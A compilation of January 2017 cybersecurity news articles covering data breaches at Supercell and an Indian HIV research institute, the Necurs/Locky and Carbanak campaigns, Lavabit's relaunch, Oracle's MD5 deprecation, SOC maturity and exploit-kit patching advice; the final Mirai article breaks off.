Cyber criminal activities in England and Wales have shown a spike in the last twelve months, Cyber frauds and computer misuse offences are most common crimes of this worrisome trend.

According to the report “Crime in England and Wales: year ending Sept 2016” published by the UK Office for National Statistics (ONS) there were 6.2 million reported incidents of crime in the 12 months to September 2016 in England and Wales.

The ONS crime report is an annual analysis of the criminal phenomena and has been produced every year for the past 35 years. Data belonging Scotland and Northern Ireland are not included because the two countries have separate judicial and policing regime.

“Headline figures from the Crime Survey for England and Wales (CSEW) produced on a consistent basis showed an estimated 6.2 million incidents of crime in the survey year ending September 2016; no statistically significant change compared with the previous year’s survey.” states the report.

“Following an extension of the coverage of the survey, Experimental Statistics showed there were 3.6 million fraud and 2.0 million computer misuse offences for the first full year in which such questions have been included in the CSEW.”

This overall figure is unchanged compared with the previous 12 months, except for the weight of the cyber criminal activities.

Experts noticed that adding 3.6 million cases of fraud and 2 million computer misuse offences to 6.2 million figure of crime, the number of reported incidents reached 11.8 million. This data represent a 90 per cent surge in criminal activities.


The most important consideration to do reading the report is the inclusion of computer crime and fraud, this means that the awareness of cyber threats is increasing.

Supercell, Clash of Clans authors, hacked. 1 Million accounts compromised
22.1.2017 securityaffairs Hacking
Reportedly, over a million accounts on the Supercell community forum have been compromised after a data breach occurred in 2016.
The firm Supercell, the authors of the notorious “The Clash of Clans” mobile game admitted that accounts on Supercell community forum have been hacked. Supercell is the creator of popular games such as Clash of Clans, Hay Day, Clash Royale, and Boom Beach.

According to an official statement issued by the company, hackers compromised more than 1 million accounts in a data breach occurred in September 2016.

LeakBase confirmed that the number of affected user account is 1 million.

The cyber attack affected the Supercell community forum said in an official statement that the breach happened in September 2016 and that the site’s forums were affected. According to the company, hackers exploited a vulnerability in the Vbulletin CMS used by Supercell for its forums.

The company confirmed that game accounts weren’t affected by the data breach.

“As we’ve said before, to provide our forum service we use software from vbulletin.com. We’re currently looking into report that a vulnerability allowed third-party hackers to gain illegal access to some forum user information, including a number of emails and encrypted passwords.” reads the official statement from the company. “Our preliminary investigation suggests that the breach happened in September 2016 and it has since been fixed. ”


Supercell urges users to change the password they are using on the affected forum as soon as possible. You can reset your password here:

Users can reset their password here: https://forum.supercell.com/login.php?do=lostpw

As usual, let me suggest users change the password in any other web service they are using with the same login credentials. As a general guideline, matching credentials should not be used on multiple sites.

“We take any such breaches very seriously and we follow very strict policies when it comes to security. Please note that this breach only affects our Forum service. Game accounts have not been affected.” the company added.

National Aids Research Institute NARI hacked by the Shad0w Security crew
21.1.2017 securityaffairs Hacking

The hacker @Sc0rp10nGh0s7 from the Shad0w Security group has broken in the server of the National Aids Research Institute NARI (India).
The hacker @Sc0rp10nGh0s7 from the Shad0w Security crew has broken in the server of the National Aids Research Institute NARI (India). The hacker accessed a more than 1 GB archive containing the results for dozens Hiv test.

The hacker just released a small portion of the compromised archive as proof of the data breach. They explained to me that they want to avoid problems with the patients, but this hack aims to demonstrate that the security staff at the Institute is not able to protect so sensitive information.

“this time we won’t leak everything, since our purpose is to hurt the gov not the people. The database file I have is more than 1Gb” told @Sc0rp10nGh0s7.

When I asked more technical details about the attack, the hacker told me that they prefer to keep secret the flaws.

I decided to avoid publishing the link to the data due to nature of the victim.

He also told me that the National Aids Research Institute NARI (India) has a good level of security despite the hack. The hacker breached an internal server of the organization and noticed the admin likes to put username & password in a text file.

“the way we choose the targets is random that helps us to not be expected, we will be in a place they least expect us to be” added the hacker.

The overall internal network was breached by the hackers.

In November 2016, the hacker Shad0wS3C hacked the Institute of the Registral Function of the State Mexico (FREM) and leaked the database online.

In August 2016, the group hacked the Paraguay’s Secretary of National Emergency (SNE) website and leaked online a dump from a PostgreSQL database.

Supercell, Clash of Clans authors, hacked. 1 Million accounts compromised
21.1.2017 securityaffairs Hacking

Reportedly, over a million accounts on the Supercell community forum have been compromised after a data breach occurred in 2016.
The firm Supercell, the authors of the notorious “The Clash of Clans” mobile game admitted that accounts on Supercell community forum have been hacked. Supercell is the creator of popular games such as Clash of Clans, Hay Day, Clash Royale, and Boom Beach.

According to an official statement issued by the company, hackers compromised more than 1 million accounts in a data breach occurred in September 2016.

LeakBase confirmed that the number of affected user account is 1 million.

The cyber attack affected the Supercell community forum said in an official statement that the breach happened in September 2016 and that the site’s forums were affected. According to the company, hackers exploited a vulnerability in the Vbulletin CMS used by Supercell for its forums.

The company confirmed that game accounts weren’t affected by the data breach.

“As we’ve said before, to provide our forum service we use software from vbulletin.com. We’re currently looking into report that a vulnerability allowed third-party hackers to gain illegal access to some forum user information, including a number of emails and encrypted passwords.” reads the official statement from the company. “Our preliminary investigation suggests that the breach happened in September 2016 and it has since been fixed. ”


Supercell urges users to change the password they are using on the affected forum as soon as possible. You can reset your password here:

Users can reset their password here: https://forum.supercell.com/login.php?do=lostpw

As usual, let me suggest users change the password in any other web service they are using with the same login credentials. As a general guideline, matching credentials should not be used on multiple sites.

“We take any such breaches very seriously and we follow very strict policies when it comes to security. Please note that this breach only affects our Forum service. Game accounts have not been affected.” the company added.

Necurs botnet is back and starts delivering the Locky ransomware
21.1.2017 securityaffairs

Cisco Security Team has noticed traces of traffic from the dormant Necurs botnet and they are warning of a possible new massive ransomware spam campaign.
Security researchers at Cisco Security Team have noticed traces of traffic from the dormant Necurs botnet and they are warning of a possible new massive ransomware spam campaign.

“The research from Talos shows that Locky spam activity has picked up again, but not nearly the volumes seen previously. “A couple of days ago we finally started seeing some spam campaigns start delivering Locky again,” the researchers wrote. “The key difference here is around volume. We typically would see hundreds of thousands ” reads a post published by Cisco.


At the time I was writing, experts just found fewer than a thousand Necurs spam messages, but the situation could rapidly degenerate. The Necurs Botnet, one of the world’s largest malicious architecture, was used to spread the Dridex banking malware and the dreaded Locky ransomware, it has vanished since June 1.

On October 2015, an international joint effort of law enforcement agencies, including the FBI and the NCA, destroyed the botnet, but it resurrected after and was used to mainly spread the Locky ransomware.


Now the Necrus botnet was being used by crooks to deliver the Locky ransomware, the overall number of attacks has quietly increased over the last week.

“Since late December we haven’t seen the typical volume of Locky, however, a couple of days ago we finally started seeing some spam campaigns start delivering Locky again,” Cisco’s researchers explained.

“The key difference here is around volume. We typically would see hundreds of thousands of Locky spam, [and now] we are currently seeing campaigns with less than a thousand messages.

“With both of these campaigns being relatively low volume these could be one offs or indicators of changes to come to the campaigns in the future.”

The researchers at the Talos team have observed two specific campaigns that are a little different than what they have seen before. One of the new campaigns delivers a malicious dropper inside a zip file that is delivered via spam email messages. Once opened, the JSE file is able to download two pieces of malware, the Locky ransomware and the Kovter Trojan.

A second campaign leverages on RAR files instead of the common zip archives. If the user extracts the archive they find a js file, doc_details.js.

“Crimeware is a lucrative endeavor with revenue rapidly approaching a billion dollars annually,” Cisco added. “This doesn’t come without significant risk and we may be entering a period where adversaries are increasingly cashing out from this activity early, to avoid severe penalties.”

Lavabit, the Snowden recommended encrypted email service, is back
21.1.2017 securityaffairs Security

Lavabit, the Snowden recommended encrypted email service, is back. Its CEO Ladar Levison announced new privacy-enhancing features.
Do you remember Lavabit? It was the US Encrypted Email Service used by the popular whistleblower Edward Snowden.
Lavabit was an encrypted webmail service founded in 2004 by Ladar Levison, it closed on August 8, 2013 after the US authorities ordered it to turn over its Secure Sockets Layer (SSL) private keys to order government surveillance activities. The US Government was interested in spying on the Edward Snowden‘s emails.
In March 2016, a redaction error in the court-ordered release of Lavabit case files confirmed that Edward Snowden was the target of the FBI that caused the termination of the secure email service.

Snowden was using the Lavabit encrypted email service and that FBI drove the company into closure because it refused to serve the US Government’s requests.

The US Government ordered to install a surveillance implant on the Lavabit servers and later to turn over Lavabit’s encryption keys allowing the Feds to access Snowden’s messages. The court order also revealed that the US Government ordered not to disclose the surveillance activity to third-party entities.

After a few weeks of legal dispute, Levison shuttered Lavabit refusing to become not become complicit in criminal surveillance operated by the US Government.

“After 38 days of legal fighting, a court appearance, subpoena, appeals and being found in contempt of court, Levison abruptly shuttered Lavabit citing government interference and stating that he would not become “complicit in crimes against the American people”.” reported the Guardian.

US authorities revealed the mysterious circumstances behind the Lavabit shut down by publishing a collection of case files that were not correctly redacted allowing to discover the target of the FBI activity, the email address Ed_Snowden@lavabit.com.

The document was integrally published by Cryptome, it is visible the Snowden’s email address was left unredacted.

Lavabit shuttered Edward Snowden email

The documents were publicly disclosed in the result of Levison’s battle against the US Government, he filed a motion in December 2015 that prompted the court to order the release of files related the Lavabit case.

Now, Levison has announced that he is reviving the Lavabit service fixing the SSL issue and implementing new privacy-enhancing features.
The Lavabit CEO is releasing the source code for an open-source end-to-end encrypted global email standard, dubbed Dark Internet Mail Environment (DIME). The code aims to avoid government surveillance and hides the metadata.

“Developed by Lavabit, DIME is an open source secure end-to-end communications platform for asynchronous messaging across the Internet. DIME follows in the footsteps of innovative email protocols, but takes advantage of the lessons learned during the 20-year history of PGP based encrypted communication. DIME is the technological evolution over current standards, OpenPGP and S/MIME, which are both difficult to deploy and only narrowly adopted. Recent revelations regarding surveillance have pushed OpenPGP and S/MIME to the forefront, but these standards simply can’t address the current privacy crisis because they don’t provide automatic encryption or protect metadata. By encrypting all facets of an email transmission (body, metadata and transport layer), DIME guarantees the security of users and the least amount of information leakage possible. A security first design, DIME solves problems that plague legacy standards and combines the best of current technologies into a complete system that gives users the greatest protection possible without sacrificing functionality.” states the description of the standard published by Lavabit.

Lavabit features

The Dark Internet Mail Environment (DIME) the standard will be available on Github along with a mail server application dubbed Magma that was designed to allow users with existing email clients to easily use Lavabit service.
“To learn more about DIME & Magma we invite you to join the Dark Mail Technical Alliance https://darkmail.info/ where you can find the latest code & specifications, provide feedback, and contribute to the development effort.”

DIME: https://darkmail.info/spec
DMAP: https://tools.ietf.org/id/draft-melnikov-dmap-00.txt
STACIE: https://tools.ietf.org/id/draft-ladar-stacie-00.txt
MAGMA: https://github.com/lavabit/magma
LIBDIME: https://github.com/lavabit/libdime
The DIME standard implements the ‘Trustful’ encryption mode that requires users to trust the server to manage the encryption and their keys.
“The server performs the encryption on your behalf, and as such, you must trust that the server will not be rewritten in such a way that it captures your password, or peeks at your messages during processing,” Levison said.

The DIME standard also implements a more strictly control over their encryption keys, it allows the users to choose the Cautious Mode and Paranoid Mode, for example, Paranoid means Lavabit will never store a user’s private keys on its server.

Lavabit service will only be accessible to existing customers in Trustful mode, others can pre-register and wait for it.

Lavabit — Encrypted Email Service Once Used by Snowden, Is Back
21.1.2017 thehackernews Safety
Texas-based Encrypted Email Service 'Lavabit,' that was forced to shut down in 2013 after not complying with a court order demanding access to SSL keys to snoop on Edward Snowden's emails, is relaunching on Friday.
Lavabit CEO Ladar Levison had custody of the service's SSL encryption key that could have helped the government obtain Snowden's password. Although the FBI insisted it was only after Snowden's account, that was the key to the kingdom that would have helped the FBI agents obtain other users’ credentials as well.
But rather than complying with the federal request that could compromise the communications of all of its customers, Levison preferred to shut down his encrypted email service, leaving its 410,000 users unable to access their email accounts.
Now, Levison has announced that he is reviving Lavabit with a new architecture that fixes the SSL problem — which according to him, was the biggest threat — and includes other privacy-enhancing features that will help its users send emails that he can't eavesdrop, even if ordered to do so.

Levison is releasing the source code for an open-source end-to-end encrypted global email standard that promises surveillance-proof messaging that even hides the metadata on emails to prevent agencies like the NSA or FBI from being able to find out with whom Lavabit users communicate.
Dubbed Dark Internet Mail Environment (DIME), the standard will be available on Github today, along with an associated mail server program called Magma, which is ready for use with the Dark Internet Mail Environment.
"DIME is the only automated, federated, encryption standard designed to work with different service providers while minimizing the leakage of metadata without a centralized authority," Levison said in a blog post.
"By encrypting all facets of an email transmission (body, metadata, and transport layer), DIME guarantees the security of users and the least amount of information leakage possible."
According to Levison, Magma server is designed to offer an easy-to-use application so that even non-technical users with existing email clients can use Lavabit encrypted email service with ease.

DIME standard includes a ‘Trustful’ encryption mode, which requires users to trust the server to manage the encryption and their keys.
"The server performs the encryption on your behalf, and as such, you must trust that the server will not be rewritten in such a way that it captures your password, or peeks at your messages during processing," Levison said.
Also, the DIME also offers Cautious Mode and Paranoid Mode for users who want absolute control over their encryption keys, so that their keys never transmits anywhere. Paranoid means Lavabit will never store a user’s private keys on its server.
Initially, the new Lavabit service will only be accessible to its existing customers and only in Trustful mode.
However, if you were not LAvabit customer in the past before the service shut down, you can pre-register and wait for the eventual rollout.

Carbanak Group Used Numerous Tools in Recent Attacks

20.1.2017 Securityweek Virus
The infamous Carbanak group of hackers has been using multiple tools in a series of attacks over the past several months, Trustwave security researchers reveal.

Starting in September 2016, the Carbanak hackers began targeting large companies in the hospitality sector in Europe and the United States, in a series of attacks that are now said to have employed different types of malicious software.

In a recent report (PDF), Trustwave researchers revealed details on the malware used, some of the executables were signed with digital certificates issued by Comodo, in an attempt to bypass security controls. Most likely, the certs were acquired using fake identities, all featuring Russian details (city, address etc.).

The Carbanak group, also known as Anunak, was exposed in 2015 after supposedly stealing upwards of $1 billion from more than 100 banks across 30 countries.

Called Grand Mars, after one of the fake company names used to purchase certificates from Comodo, these latest attacks were not aiming at financial gains alone.

“The motivation of this operation appears to be financial gain, total control of the infrastructure and collection of bots within the victim organizations. During the forensics investigation and analysis, we were given the impression that several activities have been performed by different persons or even different groups of people,” Trustwave notes.

Multiple cybercrime organizations might have cooperated in the Grand Mars operation to establish a complex system of network hosts, using numerous malicious files to attack multiple victims. During the campaign, they switched command and control (C&C) servers to ensure they remain undetected, with majority of IP addresses associated with C&Cs located in Europe (UK, France, Sweden, and Germany), but some located in the United States.

Just as with other attacks performed by Carbanak, malicious macros in Microsoft Word documents attached to emails were used as entry points. As soon as the attachment was opened and the included VisualBasic script executed, four files were dropped onto the system, in an attempt to gain some foothold to it.

The dropped files include Starter.vbs, which uses registry Autorun and Task Scheduler to achieve persistence, TransbaseOdbcDriver.js, meant to connect to Google services (Forcepoint described the process earlier this week) and Pastebin for victim ID, tracking, and command retrieval, LanCradDriver.vbs, reads and executes the commands written in a LanCradDriver.ini file, initially created empty but later populated by the previous script, and dttsg.txt.

The attackers used a variety of tools to achieve persistence as well, namely a PowerShell Script (downloaded from Google Docs), Registry Autorun (they create a key in the registry to ensure the payload runs immediately after reboot), and Task Scheduler (a scheduled task is triggered every 30 minutes indefinitely to run starter.vbs and launch the execution chain: Starter.vbs> TransbaseOdbcDriver.js> LanCradDriver.vbs> LanCradDriver.ini).

Other tools used in this campaign and deemed malicious include AdobeUpdateManagementTool.vbs (designed to connect to C&C and perform data exfiltration), UVZHDVlZ.exe (a variant of the Carbanak malware), Update.exe (Cobalt Strike’s post-exploitation tool beacon), and 322.exe (a TCP reverse shell). These files were primarily designed for persistence or data exfiltration.

“Using services such as Google Docs in order to keep track of victims and spreading malicious files becomes a very big challenge for defenders because this way is very difficult to distinguish between good and bad guys using these popular public cloud services,” the report reads.

For lateral movement in the compromised networks, the attackers used pass-the-hash, which allowed them to steal credentials of a domain level, high privileged user, the security researchers reveal. Using this technique, actors steal credential hashes from a compromised system and can expand their foothold in the network if local accounts share the same password within the infrastructure.

“Ultimately this allowed attackers to achieve domain or even enterprise admin access and gain network access by utilizing several resources as Command & Control points in Europe and US. Further investigation of the attacked infrastructure showed that the intruders deployed similar PowerShell scripts or embedded batch files in order to spread within the environment,” Trustwave’s report reads.

While some of the attacks associated with this campaign might have been performed by various malicious groups (sometimes different stages of the same attack might have been performed by different groups, with others carrying later attack stages), “the attack characteristics of this family of malware share several common traits with the, original, well understood Carbanak APT campaign, which has been positively attributed to the Russian underground financial cybercrime network,” Trustwave concludes.

Western Union Pays $586 Million to Settle Fraud Charges

20.1.2017 Securityweek Incindent
Global financial services company Western Union has admitted to facilitating wire fraud and it has agreed to forfeit $586 million as part of a settlement with the U.S. Federal Trade Commission (FTC) and the Department of Justice.

Western Union’s services have often been used by fraudsters and cybercriminals, and authorities in the United States have been displeased with the fact that the company has failed to maintain a proper anti-fraud program.

Furthermore, the company has been accused of not taking immediate action against agents that knowingly processed fraud payments in return for a cut of the illegal profits. Since 2001, the Department of Justice has convicted 29 owners and employees of Western Union agents for their role in fraud schemes.

According to authorities, Western Union has violated several laws, including the Bank Secrecy Act (BSA) and the FTC Act.

The FTC said Western Union had received, between January 2004 and August 2015, more than 550,000 complaints regarding fraudulent transfers involving advance-fee, online dating, lottery, and family emergency scams. These transfers totaled more than $632 million, but they are believed to represent only a fraction as not all complaints have been logged, not all victims filed a complaint, and fraud-reporting mechanisms are not available everywhere.

As part of its settlement with the FTC and the Justice Department, Western Union has agreed to forfeit $586 million, a sum that will be used to compensate fraud victims. The process through which the money will be distributed will be established at a later date.

The company will also implement and maintain a comprehensive anti-fraud program, thoroughly vet new and renewing agents, and suspend or terminate agents that don’t comply with its policies.

The FTC has ordered Western Union to stop processing fraud-induced and telemarketing-related money transfers, provide more fraud warnings, create additional channels for fraud complaints, and refund fraudulent transfers.

MoneyGram, Western Union’s main competitor, was also targeted by the FTC. The company agreed to pay $18 million in 2009 to settle charges.

Endgame Unveils Siri-like Feature for Security Operations Teams

20.1.2017 Securityweek Apple
Threat protection firm Endgame today announced a new AI-powered chatbot feature within its Endgame Detect and Respond (EDR) platform designed to support security analysts.

Dubbed Artemis, named after the mythological goddess of the hunt, the feature could be described as a 'Siri for SOCs'; an intelligent assistant whose purpose is to simplify and automate the hunt for network-resident attackers.

EDR's purpose is the automated use of machine learning to detect subtle indications of anomalous behavior that might indicate the presence of an attacker.

Engame LogoEDR is a hunter; but like all hunters it is most efficient with the help of a terrain guide. In modern Security Operations Centers, that guide is the system analyst, who directs and controls the hunter. Together, top-tier analysts and machine-learning automation is seen as the most effective method of detecting attackers before they can do damage.

The problem is the security skills gap -- the sparsity and cost of professional talent. According to HPE's recently published 2017 State of Security Operations report, staffing issues are one of the prime causes for SOCs failing to reach the required level of maturity. Artemis is designed to help this problem as an intelligent conversational assistant to systems analysts.

"Security teams are faced with two major challenges," says Jamie Butler, CTO at Endgame: "insufficient resources to stop attacks in-progress and lack of automated solutions to uncover malicious behavior in time to prevent information theft. Just as digital assistants like Siri or Alexa proved their ability to give time back to our day by tackling complex tasks, Artemis is an assistant that automatically combs through millions of data points to provide intelligent decisions for the security industry. Security teams," he adds, "especially those that lack sufficient resources, will now have the analytic depth required to find malicious activity across all enterprise endpoints and eliminate threats in time to stop damage and loss."

As an example, if an analyst were to ask Artemis "what is suspicious in my network today?", Artemis would comb through millions of events across endpoints in seconds and provide the user with a comprehensive list of malicious activity. But Artemis goes beyond detection into response. She then recommends a course of action and can be instructed to kill dangerous processes instantly.

In effect, Artemis empowers less-experienced Tier 1 analysts to behave at the same level of sophistication as a Tier 3. She helps SOCs adopt automation without suffering from the usual staffing problems.

Endgame raised $23 million in Series B funding in March 2013, followed by $30 million in Series C funding in November 2014.

In December 2016, Endgame announced that it had been awarded an $18.8 million contract with the U.S. Air Force to have elite Air Force Cyber Protection Teams leverage the Endgame platform to protect endpoints and critical infrastructure.

Oracle Will Stop Trusting MD5-Signed JAR Files in April

20.1.2017 Securityweek Vulnerebility
Oracle has decided to give Java developers more time to ensure that their JAR files are not signed with the MD5 algorithm. Java Runtime Environment (JRE) will no longer trust these types of files starting with April 2017.

The company announced in October plans to stop trusting JAR files signed with the MD5 algorithm, which has been known to have collision vulnerabilities for more than a decade. Oracle stopped using MD5 as the default JAR signing option in 2006 and the company now wants to take things even further.

Starting with Java SE 8u131, scheduled for release with the April 2017 Critical Patch Update (CPU), JAR files signed with MD5 will be treated as unsigned files and will not be trusted. Oracle had initially planned to stop trusting MD5-signed files in January 2017, but some developers have requested additional time to prepare for this change.

Developers have been advised to check if their JAR files have been signed using MD5 and re-sign them with a stronger algorithm or key size. The following command can be used in the Zip utility to remove existing MD5 signatures:

zip -d test.jar 'META-INF/*.SF' 'META-INF/*.RSA' 'META-INF/*.DSA'

“If you are using JARS you did not sign or build yourself, you need to contact your vendor for more information,” explained Oracle’s Erik Costlow in October. “If it can no longer be established if a JAR you are using has been signed with MD5, the recommended practice is to re-sign affected JAR files using a more modern algorithm.”

Other cryptography-related changes planned by Oracle this year for JRE and JDK include disabling SHA-1 in certificate chains anchored by roots included by default in JDK, and increasing the minimum key length for SSL and TLS to 1024 bits.

Oracle’s latest CPU patches a total of 270 vulnerabilities across its products, including 158 weaknesses that can be exploited remotely by an unauthenticated attacker. A significant number of flaws have been found in Oracle’s E-Business Suite, which seems to have attracted the attention of researchers recently.

Report Examines State of Security Operations Centers

20.1.2017 Securityweek Security
Security Operations Centers

Security Operations Centers (SOCs) are failing to meet the maturity level necessary to provide optimum security and efficiency. The 2017 State of Security Operations report finds that 82% of SOCs worldwide fail to achieve optimum maturity (a score of 3 on the Security Operations Maturity Model).

Worldwide, there has been a 3% improvement over last year; but no geographical region yet meets an average score of 2. To put this in context, North America scores 1.52 while different parts of Europe range between 1.26 and 1.47 (Benelux stands out at 1.79). Clearly there is considerable room for improvement in many SOCs; and without that improvement enterprises will remain vulnerable in the event of an attack.

The State of Security Operations report is an annual study compiled by Hewlett Packard Enterprise (HPE). It comes from the study of 137 discreet SOCs and 183 in-depth assessments. It analyzes why organizations' SOCs fall below optimum maturity, and what can be done to improve matters. Sometimes cause and remedy seem counter-intuitive -- but one difficulty keeps emerging: the difficulty in recruiting and retaining adequate security talent. Lack of qualified staff frequently leads to less than optimum solutions.

One example is in the use of a managed service provider. The immediate effect could be improved security, a reduction in costs, and reduced strain on staff recruitment. But this will decline over time without continuous management of the MSP. The use of an MSP -- which is no bad thing -- should be an active choice to improve security rather than a defensive response to reduce costs.

HPE suggests that where companies need to augment security but cannot afford the additional staff to do so, they should consider a hybrid MSP/internal integrated solution. Internal operational capability can more appropriately manage risk; will be better able to coordinate incident response; and can better align security with the organization's business objectives. In all cases the organization needs to go beyond the MSP's standard SLA to ensure that security can be or remain integrated with business objectives.

The staffing issue resurfaces with automation. The difficulty in finding and keeping quality analysts persuades some organizations to consider replacing front line analysts with automation -- but while this is good in theory, it is not always good in practice. Effective automation requires a high degree of confidence in configuration management, and organizations often have a lack of maturity in information about the applications, users, systems, and data residing in disparate repositories.

The risk of breaking something that has not been well documented then persuades some organizations to turn to an alternative but equally ineffective method: automated ticket generation. This isn't always bad, suggests HPE, but "when dealing with the behavior of an advanced threat actor and coordinated campaigns that span time, this approach usually turns the analyst into a myopic responder." In short, SOCs should think hard before eliminating front-line analysts in favor of automation.

A variant of the staffing issue returns in the growing tendency for SOCs to rely on open source tools. As with MSPs, this can provide an immediate increase in security and a reduction in costs -- but once again it usually doesn't last. OSS rarely comes with the support, documentation or metrics that can ensure compliance and security objectives remain sustainable.

Furthermore, OSS solutions frequently require customization and ongoing maintenance. Staff, however, tend not to stay as long as the software. HPE claims that security leadership usually turns over every 18 months -- and key staff can move on even sooner. Staff churn has a negative effect on the OSS maintenance, and this in turn can reduce the effectiveness and maturity of the SOC. This doesn't mean that OSS should be abandoned, but that organizations need to be aware of the ongoing commitment.

Overall SOC maturity remains well below optimal levels. HPE can find no direct correlation between high maturity and enterprise size: while some large enterprises have good maturity, other multinationals remain poor. Here the difference seems to be in management attitude and willingness to spend (which itself is linked to risk perception).

In terms of verticals, service organizations have replaced technology organizations as the more mature. The telecom industry continues to have poor maturity, partly because its primary concern is service availability. HPE expects this to improve over the next few years with the emergence of a new breed of telecommunication company. Government, however, continues to struggle -- and again it is partly the staffing issue. Rigid structures slow down implementations, while rapid staff turnover stops them even being started. As a result, for example, Government metrics tend to be based on staffing rather than maturity and effectiveness.

The whole problem is, of course, exacerbated by the rapidly changing threat landscape. The emergence of destructive malware and ransomware has demanded closer ties between SOCs and DRBC teams. New General Data Protection Regulation (GDPR) will also present new issues. Although organizations are aware of the implications, the necessary changes have not yet been implemented. The requirement to detect and inform EU citizens of personal data compromises within 72 hours will drive new SOC detection and response use cases and investment for compliance around the globe.

Given these problems, the 3% overall improvement in SOC maturity over last year is an achievement.

Cyber Threat Intelligence Shows Majority of Cybercrime is NOT Sophisticated

20.1.2017 Securityweek Analysis
It’s a new year and while some things change, some things stay the same (or similar). There’s lots of FUD about the sophisticated cyber attacks that are multi-threaded and obfuscated. Certainly there are attacks that fall into this category, but if you look at all of the cybercrime activity from the past year, it’s clear that the majority of threats do not have the level of sophistication that is often talked about.

Rather, what cyber threat intelligence is showing us is that most threats simply exploit a series of well-documented vulnerabilities and other weak points to move along the path of least resistance – and the most profit. Let’s look at some of the top threats out there today through the prism of the threat triangle, which is the actor’s capability, intent and opportunity:

1. Ransomware - This threat leverages old school, but effective, Social Engineering tactics. Getting someone to click on a malicious macro still works … even though macros are not commonly used anymore (seriously, have you or do you know anyone who has ever used a macro?). It’s human nature to be curious and that curiosity is easily exploitable.

Here are things you can do to reduce an adversary’s opportunity of successfully carrying out a ransomware campaign (and to limit your risk even if a ransomware attack is successful):

Deploy anti-phishing capabilities as this is the most common method used by attackers to kick off a campaign. Anti-malware software configured to scan all email attachments will help catch most malicious attachments. All settings that allow the documents to download and open directly should also be disabled.

Restrict unnecessary users from having administrator-level permissions on their local machines, unless specifically required. Unfortunately, in many cases local admin is given to users to make them stop complaining about an app not working. Limiting this privilege could lessen the impact of ransomware.

To all Microsoft shops - Did you know there is a GPO that can help? Microsoft has adapted group policy settings to assist system administrators in taking more appropriate steps in defending against threats such as ransomware while still keeping accustomed user functionality.

Train your users. Yeah this isn’t a new concept either, but it can be effective if done well. I don’t mean just a written policy that is a long list of “do this, don’t do that.” I once worked for an organization that had over 100+ slides in their cyber security user orientation deck, which is overwhelming to say the least. Your training program should hit on the most important points and not overwhelm users where they will tune out. Understand the top three threats to your users and focus on those top three. Have a conversation with your users. What works here is actually putting your users through real-life scenarios and doing this on a semi-regular basis. It keeps it fresh in their minds and makes them more aware.

Patch your gear - Did you know that most ransomware is served up via exploit kits when your users visit a compromised site or are delivered via a malicious payload in a phishing email? Did you know that all of the CVE’s that help protect against both scenarios have been out for quite a while? Be aggressive with vulnerability management in your user environment as they are the highest exposed.

2. Exploit kits - Many of these kits out there leverage CVE’s for which there is no good reason to NOT to patch them. Look at the RIG, Sundown and Magnitude exploit kits as recent examples. The below list includes current and past attribution lineage:

The RIG EK Exploits: CVE-2012-0507, CVE-2013-0074, CVE-2013-2465, CVE-2013-2471, CVE-2013-2551, CVE-2013-3896, CVE-2014-0311, CVE-2014-0322, CVE-2014-0497, CVE-2014-6332, CVE-2015-0313, CVE-2015-2419, CVE-2015-3090, CVE-2015-5119, CVE-2015-5122, CVE-2015-5560, CVE-2015-7645, CVE-2015-8651, CVE-2016-0034, CVE-2016-0189, CVE-2016-1019, CVE-2016-4117, CVE-2016-7200, CVE-2016-7201, CVE-2016-3298

The Sundown EK Exploits: CVE-2012-1876, CVE-2013-7331, CVE-2014-0556, CVE-2014-0569, CVE-2014-6332, CVE-2015-2444, CVE-2015-0311, CVE-2015-0313, CVE-2015-5119, CVE-2015-2419, CVE-2016-0034, CVE-2016-4117, CVE-2016-0189, CVE-2016-7200, CVE-2016-7201

The Magnitude EK Exploits: CVE-2011-3402, CVE-2012-0507, CVE-2013-2551, CVE-2013-2643, CVE-2015-0311, CVE-2015-7645, CVE-2015-3113, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1019, CVE-2016-4117

There is no reason these CVE’s should be present in your environment!

3. Credentials management - Password complexity and reuse is again nothing new or sophisticated, yet we continue to see new attacks leveraging compromised credentials from old breaches. A few business process and technical recommendations you can implement to limit this security issue:

· Re-examine your password policies and ensure they are being enforced. Users will always gravitate to the path of least resistance and will tend to leverage the weakest password option being presented. Forcing password resets at certain time periods and implementing two-factor authentication can also help protect systems from password reuse attacks.

· If you have not already done so, you should investigate deploying an easy-to-use password manager for your user base. Also don't make the assumption that this is just limited to business-related credentials. It is commonplace for a user’s personal and business credentials to be co-located both on personal and business devices. If you choose to procure a password manager for your organization, think about extending the licenses to your employees’ personal devices as well.

· Training and education - Customers, employees and other users should be dissuaded from reusing passwords from other accounts. If you suspect data has been compromised, whether directly from your site or from another breach, take proactive measures to prevent password reuse attacks by resetting passwords.

4. Extortion - Similar to ransomware, this threat leverages targets based on an unhealthy level of presence. The difference is that while ransomware encrypts your data and keeps it captive until the bad guy gets paid, an extortionist gains leverage against an organization by compromising their data via exfiltration and then embarrassing the victim to pay up. A recent example of cyber extortion revolves around an actor by the name of TheDarkOverlord, who uses social media to publicly threaten organizations and potentially expose the stolen sensitive data if not paid off.

· Remove the Opportunity - The root issue here is that our adversaries require “us” to present vulnerabilities to them in order for them to succeed. If you remove the opportunity you are directly influencing their capability to extort.

· Cyber Security “Technical Debt” - When an organization presents too much opportunity for an adversary, I am reminded of the term “Technical Debt” which is a metaphor for designing software properly versus taking short cuts to get something done faster and cheaper. To get something developed and quickly out the door, oftentimes those shortcuts taken require you to essentially take out a loan with a high interest rate. Eventually that loan will come due and you will end up paying more in the long run. The key point here is that with today's cybercriminal tactics, taking a technical debt loan opens up a whole list of additional impacts that were not typically a risk in the past. When an organization chooses to take a big technical debt loan out, it is ultimately presenting more opportunities for an adversary to exploit. You are now taking on additional risk that can potentially cause irreparable harm to your organization. These risks, if breached can cause impacts to customers (trust and loyalty), brand and reputation, and regulatory or legal action to name a few.

With cyber threat intelligence that is relevant to your business, supply chain and industry, you can pinpoint key areas of risk to address. What we’ve seen over the past year is a good reminder to focus on the security basics before addressing the more complex. There are a lot of headline-grabbing threats that tend to generate a needless frenzy, which in many cases may not have as direct an impact on your organization anyway.

Which is the real identity of the Mirai Author Anna-Senpai?
20.1.2017 securityaffairs

The popular investigator Brian Krebs published the details of his investigation on the identity of the Mirai author Anna-Senpai.
In the last months, the Mirai bot monopolized the attention of the media, it was used to power the massive DDoS attack against the Dyn DNS service causing an extended Internet outage.

A large portion of Internet users was not able to reach most important web services, many websites like including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify were down for netizens in the US.

